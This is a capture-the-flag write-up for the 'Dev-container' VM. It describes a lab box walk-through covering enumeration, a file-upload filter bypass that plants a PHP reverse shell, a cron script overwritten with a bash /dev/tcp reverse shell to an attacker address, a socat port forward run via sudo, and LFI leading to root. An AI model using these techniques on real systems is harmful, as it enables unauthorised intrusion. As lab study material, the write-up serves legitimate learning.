Dev- container CTF, is categorized a easy-intermediate VM….it is based on containers, so if you have enough knowledge about dockers/containers then it will be easy one for you..
So lets start with enumeration:
nmap -sC -A -T5 <IP>
Press enter or click to view image in full size
Only one port is open (HTTP), after open it i saw a bootstrap website…
Press enter or click to view image in full size
lets fire up you gobuster to check hidden directories…..
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Press enter or click to view image in full size
Found a interesting directory /upload….after open it i found that we can upload files in jpg,png,txt,gif,docs,zip…..format…
Press enter or click to view image in full size
So i modify a php script(change to your kali_ip address and port on which you want to listen) and save it with name “shell.php.jpg” and start my burp suit also .
locate php-reverse-shell
it will give php shell, modify it!
Press enter or click to view image in full size
Press enter or click to view image in full size
After start burp suit and click on submit you will saw a request, now change the file name shell.php.jpg to shell.php..and forwarded the request.
Press enter or click to view image in full size
You will see that your file is successfully submit, its time to listen by netcat on port you mention in php code.
Press enter or click to view image in full size
Great we got www-data shell i check almost every directory but i didn’t get anything useful, the i went to /var/www/html and found Maintenance-Web-Docker, and in that i found 3 files
here i saw script list.sh which is writable, and after opening it i found that it is a bash script written the out.txt, lets check out.txt file
Press enter or click to view image in full size
Okay so we can see list.sh is running in every minute….now i just modify list.sh file and put reverse shell into it.
echo “bash -i >& /dev/tcp/<local_ip>/<LPORT> 0>&1” > list.sh
now start listing by netcat and wait for a minute, you will get shell
Cool! we got richard’s user shell and user.txt also, its time to root..check
sudo -l
Press enter or click to view image in full size
we got a command, we can run this by sudo -u root, but before that lets check what it is in HackTools directory, after open it we got 2 files README.txt and socat….now just run the command here that we found by sudo -l.
sudo -u root /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90
Press enter or click to view image in full size
Just go on browser and check <VM_ip:8080>, you will find a new page.
Press enter or click to view image in full size
after going in ABOUT US and CONTACT i noticed that there will be LFI may be…so i just checked for LFI…
Press enter or click to view image in full size
Okay! i was correct, now we can upload php file again and can get root shell :)
Get Anant chauhan’s stories in your inbox
Join Medium for free to get updates from this writer.
i repeat the process again, that i did for getting www-data shell, for convenience i just change LPORT in php code (i don’t know why, but i did) named that file shell1.php.jpg so that i can easily found..
After uploading go to www-data shell and change directory to /var/www/html/upload/files and you will find your second php file there.
just cp that file to /tmp/shell.php directory.
now go to browser again and write
and listen by netcat, you should get your root shell :)
Press enter or click to view image in full size
*HAPPY HACKING*